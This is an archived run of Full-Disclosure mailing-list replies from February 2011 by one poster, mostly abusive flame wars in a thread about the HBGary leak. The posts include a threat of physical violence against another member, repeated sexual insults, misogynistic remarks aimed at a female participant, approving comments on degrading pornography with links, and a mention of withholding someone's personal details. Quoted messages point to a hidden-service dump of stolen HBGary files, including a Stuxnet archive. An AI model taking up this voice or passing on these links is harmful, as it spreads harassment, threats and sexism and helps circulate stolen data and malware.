2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
Prominent figure? LMFAO. As for threat of violence, go suck my nice juicy
hairy ball sack :)


>
> On Thu, Feb 17, 2011 at 6:19 PM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
>> On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming [Simplicity Media Ltd] <
>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>> > Ah, now this is a different subject entirely! It suits some, but not
>> > others.
>>
>> Are you trying to distract the many police forces throughout the UK who
>> are subscribed to the list that you made a threat of violence towards a
>> prominent figure in the security community?
>>
>> On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity Media Ltd] <
>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>> > I hope you turn up at my next conference, so I can slap the fuck out of
>> you
>> > in front of everyone.
>> > Little bitch like you would probably go running to the police as well.
>>
>> Obviously, criminals are reported to the police. The problem here is, this
>> list is already populated with police forces throughout the UK.
>>
>> They may even ask me to attend the next conference you appear at, and then
>> cuff you as soon as you lay a hand on me.
>>
>> Cal Leeming, the so-called reformed criminal ends up back in court and
>> infront of the media glare.
>>
>> Andrew
>>
>>
>>
>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
i.just.watched.a.dumb.broad.get.owned.at.facialabuse.com

Maybe if I ask the client really nicely, he'll let me add that A record
:D

2011/2/17 Thor (Hammer of God) 

>  Suddenly, I see a whole new market for the domain name you and I were
> going to get :)  I need to check on that…
>
> t
>
>
>
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Cal Leeming
> [Simplicity Media Ltd]
> *Sent:* Thursday, February 17, 2011 10:06 AM
> *To:* phocean
> *Cc:* """full-disclosure@lists.grok.org.uk"""; andrew.wallace
> *Subject:* [Full-disclosure] (this thread is now about porn).‏
>
>
>
> Ah, now this is a different subject entirely! It suits some, but not
> others.
>
>
>
> Personally, I think there's nothing better (porn wise) than seeing the sad
> look on a dumb broads face after she realized what she's just done. Or even
> better, the constant sad look on her face when she's doing the scene, and
> you know she's only doing it for the money, and that it's her first time,
> and probably her last. Mind you, working on facialabuse.com has pretty
> much desensitized me to *everything* (check out the Tecey video, classic
> example!). Maybe check out the front page video for 
> http://bit.ly/1KTVJv(xxxlubetube), I gotta admit that did kinda make me go 
> "eww".
>
>
>
> And another thing, no matter how bad a recession is, there will *always* be
> a market for sex and porn. No matter if someone loses their job, their home,
> their wife and kids etc, their hand and the internet will be a steady friend
> for them. It helps save marriages because it gives the individual a means of
> escape and fantasy, without resorting to cheating.
>
>
>
>
>
>
>
> On Thu, Feb 17, 2011 at 5:56 PM, phocean <0...@phocean.net> wrote:
>
> If so, I sincerely feel sorry for you :(
> This shit can really destroy your life if you are not careful and loose
> sight of important things of life. Good luck !
>
> Le jeudi 17 février 2011 à 17:47 +, Cal Leeming [Simplicity Media
> Ltd] a écrit :
>
> > Considering for the last 18 months my work has been primarily in adult
> > content, and I have to deal with sexual/immature/aggressive bullshit
> > on a daily basis, I think this was a reasonable response. lol.
> >
>
>
>

[Full-disclosure] (this thread is now about porn).‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
Ah, now this is a different subject entirely! It suits some, but not
others.

Personally, I think there's nothing better (porn wise) than seeing the sad
look on a dumb broads face after she realized what she's just done. Or even
better, the constant sad look on her face when she's doing the scene, and
you know she's only doing it for the money, and that it's her first time,
and probably her last. Mind you, working on facialabuse.com has pretty much
desensitized me to *everything* (check out the Tecey video, classic
example!). Maybe check out the front page video for
http://bit.ly/1KTVJv(xxxlubetube), I gotta admit that did kinda make
me go "eww".

And another thing, no matter how bad a recession is, there will *always* be
a market for sex and porn. No matter if someone loses their job, their home,
their wife and kids etc, their hand and the internet will be a steady friend
for them. It helps save marriages because it gives the individual a means of
escape and fantasy, without resorting to cheating.



On Thu, Feb 17, 2011 at 5:56 PM, phocean <0...@phocean.net> wrote:

> If so, I sincerely feel sorry for you :(
> This shit can really destroy your life if you are not careful and loose
> sight of important things of life. Good luck !
>
> Le jeudi 17 février 2011 à 17:47 +, Cal Leeming [Simplicity Media
> Ltd] a écrit :
> > Considering for the last 18 months my work has been primarily in adult
> > content, and I have to deal with sexual/immature/aggressive bullshit
> > on a daily basis, I think this was a reasonable response. lol.
> >
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
Considering for the last 18 months my work has been primarily in adult
content, and I have to deal with sexual/immature/aggressive bullshit on a
daily basis, I think this was a reasonable response. lol.

Sometimes, people really do just deserve a slap. Tho, I doubt Andrew will
ever surface irl :S

On Thu, Feb 17, 2011 at 5:43 PM, phocean <0...@phocean.net> wrote:

> Can you please stop insulting and using {agressive, immature, sexual...}
> oriented words.
> Too much is too much. Relax, take a deep breath outside and let's go
> back to the real stuff.
> Thanks.
>
> Le jeudi 17 février 2011 à 17:38 +0000, Cal Leeming [Simplicity Media
> Ltd] a écrit :
> > I don't give a fuck tbh, I really don't.
> >
> > On Thu, Feb 17, 2011 at 5:38 PM, Benji  wrote:
> > Probably a bad idea to threaten violence, just sayin'
> >
> >
> > Also what conferences would these be? hak5 learn-to-pwn?
> >
> >
> > On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity Media
> > Ltd]  wrote:
> >
> >
> > I hope you turn up at my next conference, so I can
> > slap the fuck out of you in front of everyone.
> >
> >
> > Little bitch like you would probably go running to the
> > police as well.
> >
> >
> > On Thu, Feb 17, 2011 at 5:28 PM, andrew.wallace
> >  wrote:
> > On Thu, Feb 17, 2011 at 4:27 PM, Paul Schmehl
> >  wrote:
> > > Does anyone on this list really give a crap
> > that you guys like publicly
> >     > pulling your puds?
> > >
> > > At some point in life, most people grow up.
> >
> >
> > On Thu, Feb 17, 2011 at 4:57 PM, Cal Leeming
> > [Simplicity Media Ltd]
> >  wrote:
> >
> > > I disagree. Unless you are the bitch who
> > hands out the tea and biscuits.
> >
> >
> > Like Paul said, you have a lot of growing up
> > to do, that's why people want you off the
> > list.
> >
> > Andrew
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
>
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
I don't give a fuck tbh, I really don't.

On Thu, Feb 17, 2011 at 5:38 PM, Benji  wrote:

> Probably a bad idea to threaten violence, just sayin'
>
> Also what conferences would these be? hak5 learn-to-pwn?
>
> On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> I hope you turn up at my next conference, so I can slap the fuck out of
>> you in front of everyone.
>>
>> Little bitch like you would probably go running to the police as well.
>>
>>
>> On Thu, Feb 17, 2011 at 5:28 PM, andrew.wallace <
>> andrew.wall...@rocketmail.com> wrote:
>>
>>> On Thu, Feb 17, 2011 at 4:27 PM, Paul Schmehl 
>>> wrote:
>>> > Does anyone on this list really give a crap that you guys like publicly
>>> > pulling your puds?
>>> >
>>> > At some point in life, most people grow up.
>>>
>>> On Thu, Feb 17, 2011 at 4:57 PM, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>> > I disagree. Unless you are the bitch who hands out the tea and
>>> biscuits.
>>>
>>> Like Paul said, you have a lot of growing up to do, that's why people
>>> want you off the list.
>>>
>>> Andrew
>>>
>>>
>>
>>
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
I hope you turn up at my next conference, so I can slap the fuck out of you
in front of everyone.

Little bitch like you would probably go running to the police as well.

On Thu, Feb 17, 2011 at 5:28 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 4:27 PM, Paul Schmehl 
> wrote:
> > Does anyone on this list really give a crap that you guys like publicly
> > pulling your puds?
> >
> > At some point in life, most people grow up.
>
> On Thu, Feb 17, 2011 at 4:57 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > I disagree. Unless you are the bitch who hands out the tea and biscuits.
>
> Like Paul said, you have a lot of growing up to do, that's why people want
> you off the list.
>
> Andrew
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
I disagree. Unless you are the bitch who hands out the tea and biscuits.

On Thu, Feb 17, 2011 at 4:55 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 4:49 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > No, it was you that made suggestions that you potentially did work for
> the
> > government.
>
> Absolutely not, I said I'm the founder of a consortium who meet to have
> roundtable discussions between the public and private sector.
>
> It's in black and white on our web site.
>
> Andrew
>
>
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
No, it was you that made suggestions that you potentially did work for the
government.

I cba to argue with your trolling any more dude, go suck a cock :)

On Thu, Feb 17, 2011 at 4:47 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 4:31 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > I bet you never even used the term "local authority" until I posted it
> just
> > then lol.
> > As for 'central government organisation' in Cheltenham, you are most
> > likely referring to GCHQ and/or the new department that was branched off
> > from it to deal with cyber crime. If this is the case, then you are going
> to
> > be taught a very serious lesson from one of the risk assessment officers.
> > Even hinting that you have involvements with GCHQ outside of you duties
> > (unless you are an MP making a public statement), is grounds to have your
> > employment/contract suspended and/or terminated.
> > Seriously mate, I know the score when it comes to this area, and I don't
> > even for a second the bullshit you are peddling.
>
> I don't have involvement with them, it was "James Rankin" who was claiming
> to work for the government. However, he hasn't heard of me and I haven't
> heard of him. So its likely he is the one feeding both of us with fairy tale
> stories about his position in government.
>
> Andrew
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
I bet you never even used the term "local authority" until I posted it just
then lol.

As for 'central government organisation' in Cheltenham, you are most
likely referring to GCHQ and/or the new department that was branched off
from it to deal with cyber crime. If this is the case, then you are going to
be taught a very serious lesson from one of the risk assessment officers.
Even hinting that you have involvements with GCHQ outside of your duties
(unless you are an MP making a public statement), is grounds to have your
employment/contract suspended and/or terminated.

Seriously mate, I know the score when it comes to this area, and I don't
even for a second the bullshit you are peddling.

On Thu, Feb 17, 2011 at 4:26 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 4:11 PM, James Rankin 
> wrote:
> > I don't want to be invited for cross-dressing talks with you, you
> delusional
> > moron
> >
> > Get back down the pub.
> >
> > A long way to go? I make good money from my career, matey. (Career. Ever
> > heard of one?) You on the other hand are firmly wedged in cloud-cuckoo. I
> > work for the government at the minute, and no-one here has ever heard of
> > you.
> >
> > Goodnight.
>
> Perhaps you work for a local government authority, however you aren't
> involved with any central government organisation in Cheltenham or London.
>
> The way you talk to people, you are unlikely to be involved in anything
> meaningful within the government, perhaps a local authority though.
>
> Andrew
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
Obviously.

On Thu, Feb 17, 2011 at 3:36 PM, Kain, Rebecca (.)  wrote:

>  I had sex with him, obviously.  that's how he got my picture to post here
>
> -becki
>
>
>  --
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Cal Leeming
> [Simplicity Media Ltd]
> *Sent:* Thursday, February 17, 2011 10:33 AM
> *To:* PsychoBilly
> *Cc:* fdisclo
> *Subject:* Re: [Full-disclosure]from hbgary: stuxnet, WL attack, Psyop and
> Anonymous trackdown‏
>
> Has anyone here actually met Andrew (if that's his name) irl?
>
> On Thu, Feb 17, 2011 at 3:01 PM, PsychoBilly  wrote:
>
>> tss tss
>> appearence of a thesis
>> but stuffed with approximations
>> IE p.15
>> " and “Unix Terrorist” is likely European. "
>>
>>
>>
>> [[   Cal Leeming [Simplicity Media Ltd]   ]] @ [[   17/02/2011 15:01
>> ]]--
>> > I refer everyone to:
>> >
>> >
>> http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw
>> > <
>> http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw
>> >
>> >
>> >
>>
>>
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
Has anyone here actually met Andrew (if that's his name) irl?

On Thu, Feb 17, 2011 at 3:01 PM, PsychoBilly  wrote:

> tss tss
> appearence of a thesis
> but stuffed with approximations
> IE p.15
> " and “Unix Terrorist” is likely European. "
>
>
>
> [[   Cal Leeming [Simplicity Media Ltd]   ]] @ [[   17/02/2011 15:01
> ]]--
> > I refer everyone to:
> >
> >
> http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw
> > <
> http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw
> >
> >
> >
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
Andrew, have you even looked at my linkedin profile?

I designed and implemented an embedded router (from scratch) directly for a
local authority in the UK for UTMS (Urban Traffic Management System). I also
gave a private conference (where I was the *only* speaker) of which there
were 40 attendees from large financial institutions, NCS (National Crime
Squad, now known as SOCA) and APACS.

For example, I doubt you have even heard of QinetiQ, let alone had any
involvement with them :S

On Thu, Feb 17, 2011 at 2:50 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 2:20 PM, James Rankin 
> wrote:
> > No-one in the UK or UK security community has heard of Nettie or his
> > consultancy.
> >
> > He's just a deluded Jocko pisspot
>
> I've been a member for the last 12 years and frequent industry conferences
> regularly, as well as chair roundtable discussions between the sectors. I
> doubt you've ever been involved in any of that, because speaking to me in
> the manner you are, you are unlikely to be invited for cross-industry talks
> with anyone.
>
> Learn to respect others and get on with people instead of posting abusive
> messages to mailing lists, and you may get invited into talks between the
> government and the private sector.
>
> Judging by your email though it seems you have a long way to go.
>
> Andrew
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
I refer everyone to:

http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw


On Thu, Feb 17, 2011 at 1:51 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Wed, Feb 16, 2011 at 5:54 PM, Old Timer  wrote:
> > andrew:
> >
> > "Cal is a blackhat with criminal convictions, I hope he is forced from
> the
> > list by an uprising of whitehats.
> >
> > I'm a whitehat and its upsetting to see the disclosure community being
> taken
> > over by criminals.
> >
> > Andrew"
> >
> >
> > hahahah
> >
> > Why don't you have a quick glance at the list charter and see who founded
> > this list ?  Then go look them up in wikipedia
> >
> > While yer at it, check out Scott Chasin, who founded bugtraq...
> >
> > And 8lgm, who were prolific bugtraq posters...
> >
> > the list goes on and on (and on and on).  How old are you, son ?
>
> n3td3v - Brief history of the consortium and timeline
>
> How We Started
>
> * Founded by entrepreneur and IT Security Consultant, Andrew Wallace.
>
> * The aged 30-something year old was born in 1981 and started the
> consultancy at the young age of 18.
>
> * n3td3v - IT Security Consultancy was founded in 1999 and helped the
> entrepreneur launch his career in IT Security.
>
> * Today, 2011, we are one of the most well known non-profit IT Security
> consortia in the UK.
>
> Learn more: https://sites.google.com/site/n3td3v/
>
> Andrew
>
>
>
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-16 Thread Cal Leeming [Simplicity Media Ltd]
Go and fuck yourself. Hard.

On Wed, Feb 16, 2011 at 7:42 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Wed, Feb 16, 2011 at 4:20 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > Come at me bro. :D
>
> The security and intelligence community in the UK do not appreciate this
> comment, I ask you to cease and desist with immediate effect.
>
> Andrew
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-16 Thread Cal Leeming [Simplicity Media Ltd]
Come at me bro. :D

On Wed, Feb 16, 2011 at 4:18 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Wed, Feb 16, 2011 at 3:20 PM, huj huj huj  wrote:
> > caldouche you look spiffy in a dress
>
> Cal is a blackhat with criminal convictions, I hope he is forced from the
> list by an uprising of whitehats.
>
> I'm a whitehat and it's upsetting to see the disclosure community being
> taken over by criminals.
>
> Andrew
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-16 Thread Cal Leeming [Simplicity Media Ltd]
Why thank you :D

On Wed, Feb 16, 2011 at 3:20 PM, huj huj huj  wrote:

> caldouche you look spiffy in a dress
>
> 2011/2/15 Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk>
>
>
>> http://a1.l3-images.myspacecdn.com/images01/49/3fb5839feabb972e4b40c2807e328396/l.jpg
>>
>> Rule 34. Now.
>>
>>
>> On Tue, Feb 15, 2011 at 9:13 PM, Cal Leeming [Simplicity Media Ltd] <
>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>
>>> I now also declare rule 34.
>>>
>>> On Tue, Feb 15, 2011 at 9:10 PM, Eyeballing Weev <
>>> eyeballing.w...@gmail.com> wrote:
>>>
>>>> You look really good in heels and a skirt, nice legs also.
>>>>
>>>> On 02/15/2011 04:08 PM, Kain, Rebecca (.) wrote:
>>>> > Of course that's where I got it from.  A woman couldn't be *that*
>>>> > creative
>>>> >
>>>> >
>>>>
>>>>
>>>>
>>>
>>>
>>
>>
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-15 Thread Cal Leeming [Simplicity Media Ltd]
I now also declare rule 34.

On Tue, Feb 15, 2011 at 9:10 PM, Eyeballing Weev
wrote:

> You look really good in heels and a skirt, nice legs also.
>
> On 02/15/2011 04:08 PM, Kain, Rebecca (.) wrote:
> > Of course that's where I got it from.  A woman couldn't be *that*
> > creative
> >
> >
>
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-15 Thread Cal Leeming [Simplicity Media Ltd]
I declare rule 31 on Rebecca.

( As you are a girl, and therefore are unaware of the rules of the internet,
please may I direct your attention to
http://encyclopediadramatica.com/Rules_of_the_Internet )

On Tue, Feb 15, 2011 at 9:08 PM, Kain, Rebecca (.)  wrote:

> Of course that's where I got it from.  A woman couldn't be *that*
> creative
>
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Randal
> T. Rioux
> Sent: Tuesday, February 15, 2011 4:05 PM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop
> and Anonymous trackdown
>
> Thought this would be appropriate :-)
>
> http://xkcd.com/149/
>
> On 2/15/2011 4:00 PM, Eyeballing Weev wrote:
> > What do you expect from a woman?
> >
> > Rebecca, kindly make me a sandwich
> >
> > On 02/15/2011 03:44 PM, Cal Leeming [Simplicity Media Ltd] wrote:
> >> I did apologise, no need to drag it out into the yard and beat it with a
> >> stick lol.
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-15 Thread Cal Leeming [Simplicity Media Ltd]
http://a1.l3-images.myspacecdn.com/images01/49/3fb5839feabb972e4b40c2807e328396/l.jpg

Rule 34. Now.

On Tue, Feb 15, 2011 at 9:13 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> I now also declare rule 34.
>
> On Tue, Feb 15, 2011 at 9:10 PM, Eyeballing Weev <
> eyeballing.w...@gmail.com> wrote:
>
>> You look really good in heels and a skirt, nice legs also.
>>
>> On 02/15/2011 04:08 PM, Kain, Rebecca (.) wrote:
>> > Of course that's where I got it from.  A woman couldn't be *that*
>> > creative
>> >
>> >
>>
>>
>>
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-15 Thread Cal Leeming [Simplicity Media Ltd]
I did apologise, no need to drag it out into the yard and beat it with a
stick lol.

On Tue, Feb 15, 2011 at 8:33 PM, Kain, Rebecca (.)  wrote:

>
>  cool, thanks coderman
>
> If something's a private joke, I don't see why it needed to be aired
> here, that's all.
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of coderman
> Sent: Tuesday, February 15, 2011 3:31 PM
> To: Eyeballing Weev
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop
> and Anonymous trackdown
>
> On Tue, Feb 15, 2011 at 7:48 AM, Eyeballing Weev
>  wrote:
> > Wanna hang out later, Rebecca? I got some cocaine, LSD and pills that if
> > we get caught I will claim they are not mine and the police planted them
> > on us.
>
> poor eyeballer, must be bored silly.  did you leech that correctional
> cctv feed yet?
>
> and beware Rebecca, eyeballer is a selfish and arrogant lover, like
> Assange perhaps. don't be a link to his node on the irc sex chart!
>
> :o
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-15 Thread Cal Leeming [Simplicity Media Ltd]
Bit of an inside joke, sorry, should have kept it off the list!

On Tue, Feb 15, 2011 at 3:30 PM, Kain, Rebecca (.)  wrote:

>  I haven't understood a word of this so far
>
>
>  --
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *huj huj huj
> *Sent:* Tuesday, February 15, 2011 10:29 AM
> *To:* Cal Leeming [Simplicity Media Ltd]
> *Cc:* full-disclosure@lists.grok.org.uk
>
> *Subject:* Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop
> and Anonymous trackdown
>
> hey funboys! get a room..
>
> 2011/2/15 Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk>
>
>> Come at me bro :D
>>
>>
>> On Tue, Feb 15, 2011 at 1:29 PM, Benji  wrote:
>>
>>> fighting words.
>>>
>>>
>>> On Tue, Feb 15, 2011 at 1:27 PM, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>
>>>> I know right?
>>>>
>>>> First I hold myself back from posting your dox everywhere, and now
>>>> this!
>>>>
>>>>  On Tue, Feb 15, 2011 at 1:06 PM, Benji  wrote:
>>>>
>>>>> Well check you out.
>>>>>
>>>>>
>>>>> On Tue, Feb 15, 2011 at 12:12 PM, Cal Leeming [Simplicity Media Ltd] <
>>>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>>>
>>>>>> Lol, I ain't touching this shit with a barge pole.
>>>>>>
>>>>>> On Mon, Feb 14, 2011 at 11:05 PM,  wrote:
>>>>>>
>>>>>>> HI
>>>>>>>
>>>>>>> i extracted all attachments from the first 3 emails, provided a dump
>>>>>>> of all files categorized by type.
>>>>>>>
>>>>>>> Also you can spread the most significative files on
>>>>>>> anonymous/wikileaks that i selected on the web page.
>>>>>>>
>>>>>>> http://xqz3u5drneuzhaeo.onion/users/hbgary/
>>>>>>>
>>>>>>> It doesn't include attachment from greg emails.
>>>>>>>
>>>>>>> It can be also accessed with:
>>>>>>>
>>>>>>> https://tor-proxy.net/proxy/express/browse.php?u=http%3A%2F%2Fxqz3u5drneuzhaeo.onion%2Fusers%2Fhbgary%2F&b=26
>>>>>>> and
>>>>>>> https://xqz3u5drneuzhaeo.tor2web.org/users/hbgary/
>>>>>>>
>>>>>>> - Digital PSYOP / INFOOPS to influence public media in support to US
>>>>>>> Government
>>>>>>>
>>>>>>> PSYOPS Response.doc
>>>>>>> PPT/PSYOP Process-1.ppt
>>>>>>> PAGES/PSYOPS Response-1.pages
>>>>>>>
>>>>>>> - Anti Anonymous Operations
>>>>>>>
>>>>>>> PDF/Anonymous_v2.pdf with list of operations, name, nicknames
>>>>>>> DOC/Anonymous.docx
>>>>>>>
>>>>>>> - Anti-Wikileaks Operations
>>>>>>> /PPT/WikiLeaks Response v6.pptx
>>>>>>>
>>>>>>> - Analysis of security incidents such as Google Aurora Hacking by
>>>>>>> Chinese Gov, Stuxnet, etc
>>>>>>>
>>>>>>> PDF/HBGThreatReport_Aurora.pdf
>>>>>>> DOC/Aurora_report_v3.docx
>>>>>>> PPT/Aurora Tech Group.ppt
>>>>>>>
>>>>>>> - Stuxnet
>>>>>>> ZIP/stuxnet.zi_
>>>>>>>
>>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>
>>>
>>
>>
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-15 Thread Cal Leeming [Simplicity Media Ltd]
Come at me bro :D

On Tue, Feb 15, 2011 at 1:29 PM, Benji  wrote:

> fighting words.
>
>
> On Tue, Feb 15, 2011 at 1:27 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> I know right?
>>
>> First I hold myself back from posting your dox everywhere, and now this!
>>
>> On Tue, Feb 15, 2011 at 1:06 PM, Benji  wrote:
>>
>>> Well check you out.
>>>
>>>
>>> On Tue, Feb 15, 2011 at 12:12 PM, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>
>>>> Lol, I ain't touching this shit with a barge pole.
>>>>
>>>> On Mon, Feb 14, 2011 at 11:05 PM,  wrote:
>>>>
>>>>> HI
>>>>>
>>>>> i extracted all attachments from the first 3 emails, provided a dump of
>>>>> all files categorized by type.
>>>>>
>>>>> Also you can spread the most significative files on anonymous/wikileaks
>>>>> that i selected on the web page.
>>>>>
>>>>> http://xqz3u5drneuzhaeo.onion/users/hbgary/
>>>>>
>>>>> It doesn't include attachment from greg emails.
>>>>>
>>>>> It can be also accessed with:
>>>>>
>>>>> https://tor-proxy.net/proxy/express/browse.php?u=http%3A%2F%2Fxqz3u5drneuzhaeo.onion%2Fusers%2Fhbgary%2F&b=26
>>>>> and
>>>>> https://xqz3u5drneuzhaeo.tor2web.org/users/hbgary/
>>>>>
>>>>> - Digital PSYOP / INFOOPS to influence public media in support to US
>>>>> Government
>>>>>
>>>>> PSYOPS Response.doc
>>>>> PPT/PSYOP Process-1.ppt
>>>>> PAGES/PSYOPS Response-1.pages
>>>>>
>>>>> - Anti Anonymous Operations
>>>>>
